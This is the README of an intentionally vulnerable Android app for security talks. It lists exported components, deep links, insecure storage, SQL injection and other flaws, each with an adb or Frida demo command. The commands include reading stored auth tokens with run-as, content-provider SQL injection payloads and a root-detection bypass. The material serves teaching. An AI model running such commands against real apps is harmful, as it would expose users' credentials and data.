An intentionally vulnerable Android app for security presentations.
Built to demonstrate real Android vulnerabilities live on stage. Every screen has a "How to Hack" and "How to Protect" section.
This app is intentionally insecure. Never install on a production device or use with real credentials. For educational/demo purposes ONLY.
Β
Β
Β
Β
Β
| # | Vulnerability | Severity | Live Demo |
|---|---|---|---|
| 1 | Exported Components | π΄ CRITICAL | adb shell am start -n com.hackdroid.demo/.vulns.AdminActivity |
| 2 | Deep Links | π HIGH | adb shell am start -a VIEW -d "hackdroid://transfer?amount=9999&to=attacker" |
| 3 | WebViews / JS Bridge | π HIGH | Load webview_demo.html in the WebView demo |
| 4 | Insecure Storage | π‘ MEDIUM | adb shell run-as com.hackdroid.demo cat /data/data/com.hackdroid.demo/shared_prefs/auth_prefs.xml |
| 5 | SQL Injection | π‘ MEDIUM | adb shell content query --uri content://com.hackdroid.demo.provider/users --where "1=1" |
| 6 | Reverse Engineering | βͺ LOW | jadx -d out/ app.apk |
| 7 | Broadcast Receivers | βͺ LOW | adb shell am broadcast -a com.hackdroid.RESET_AUTH |
- Android Studio Hedgehog or newer
- Android device or emulator (rooted recommended for full demo)
- ADB installed and on PATH
- Java 17+
git clone https://github.com/jacksonfdam/hackdroid
cd hackdroid
./gradlew assembleDebug
adb install app/build/outputs/apk/debug/app-debug.apk- Settings β About Phone β tap "Build Number" 7 times
- Settings β Developer Options β Enable USB Debugging
adb devicesβ confirm device listed
adb shell am start -n com.hackdroid.demo/.vulns.AdminActivityExpected: Admin panel opens without any login screen.
adb shell am start -a android.intent.action.VIEW \
-d "hackdroid://transfer?amount=9999&to=attacker"Expected: Transfer screen shows attacker-controlled values with no validation.
# No root required β works on any debug APK
adb shell run-as com.hackdroid.demo \
cat /data/data/com.hackdroid.demo/shared_prefs/auth_prefs.xml
# Alternative: copy to sdcard, then pull
adb shell run-as com.hackdroid.demo \
cp /data/data/com.hackdroid.demo/shared_prefs/auth_prefs.xml /sdcard/auth_prefs.xml
adb pull /sdcard/auth_prefs.xml && cat auth_prefs.xmlExpected: Auth token, email, and session ID visible in plain XML.
Why
run-asinstead ofadb pull? Directadb pullof/data/data/requires root.run-asworks on any debug build without root β making this a real-world attack, not just a rooted-device demo.
# Simplest β no shell-quoting issues
adb shell content query \
--uri content://com.hackdroid.demo.provider/users \
--where "1=1"
# Classic tautology payload (inner double-quotes must be escaped for the remote shell)
adb shell content query \
--uri content://com.hackdroid.demo.provider/users \
--where "\"name='x' OR '1'='1'\""Expected: All user rows returned including plaintext tokens.
Shell quoting note:
adb shellpasses arguments to the device shell, so--wherevalues containing spaces and single quotes need an extra layer of quoting.1=1is the easiest demo payload β still a valid SQL injection tautology.
adb shell am broadcast -a com.hackdroid.RESET_AUTHExpected: App shows Toast "β Auth state cleared via broadcast!" and all SharedPreferences are wiped.
adb shell am startservice -n com.hackdroid.demo/.vulns.LeakyService
adb logcat | grep HackDroid_LEAKExpected: Session token, email, and API key printed to Logcat.
Open Vulns β WebViews / JS Bridge β Run Demo Exploit β use the buttons in the WebView page.
frida -U -f com.hackdroid.demo --no-pause \
-l app/src/main/assets/frida_scripts/bypass_root_detection.jsExpected: [HackDroid] β Root detection bypassed β all checks return false
| Tool | Purpose | Install |
|---|---|---|
| ADB | Device communication | Android Platform Tools |
| Frida | Runtime hooks | pip install frida-tools |
| JADX | APK decompiler | brew install jadx |
| Burp Suite | Traffic intercept | portswigger.net |
| MobSF | Auto scanner | docker run -it opensecurity/mobile-security-framework-mobsf |
app/src/main/
βββ java/com/hackdroid/demo/
β βββ MainActivity.kt
β βββ data/
β β βββ VulnerabilityData.kt
β βββ navigation/
β β βββ AppNavigation.kt
β βββ security/
β β βββ RootChecker.kt β Hooked by Frida demo
β βββ ui/
β β βββ theme/
β β β βββ Color.kt
β β β βββ Type.kt
β β β βββ Theme.kt
β β βββ screens/
β β βββ HomeScreen.kt
β β βββ VulnListScreen.kt
β β βββ VulnDetailScreen.kt
β β βββ ExploitLabScreen.kt
β β βββ DefenseGuideScreen.kt
β β βββ ToolkitScreen.kt
β β βββ DemoScreens.kt
β βββ viewmodel/
β β βββ HackDroidViewModel.kt
β βββ vulns/
β βββ AdminActivity.kt β CRITICAL: exported, no auth
β βββ DeepLinkActivity.kt β HIGH: unvalidated params
β βββ LeakyService.kt β HIGH: logs secrets to Logcat
β βββ AuthResetReceiver.kt β LOW: exported broadcast
β βββ VulnerableContentProvider.kt β MEDIUM: SQL injection
β βββ InsecureStorageActivity.kt β MEDIUM: plain SharedPrefs
β βββ WebViewDemoActivity.kt β HIGH: JS bridge exploit
βββ assets/
β βββ webview_demo.html
β βββ frida_scripts/
β βββ bypass_root_detection.js
β βββ bypass_ssl_pinning.js
β βββ dump_strings.js
βββ AndroidManifest.xml
Each screen in the app maps directly to a slide in your presentation:
| Screen | Vuln | Live Demo Command |
|---|---|---|
| Exploit Lab β Bypass Exported Activity | Exported Components | Demo 1 |
| Exploit Lab β Deep Link Injection | Deep Links | Demo 2 |
| Exploit Lab β Read SharedPreferences | Insecure Storage | Demo 3 |
| Vuln Detail β SQL Injection | SQL Injection | Demo 4 |
| Broadcast Receivers (ADB) | Broadcast Receivers | Demo 5 |
| WebView Demo | WebViews | Demo 7 |
| Exploit Lab β Frida Hook | Reverse Engineering | Demo 8 |
MIT β for educational use only. The authors are not responsible for misuse.
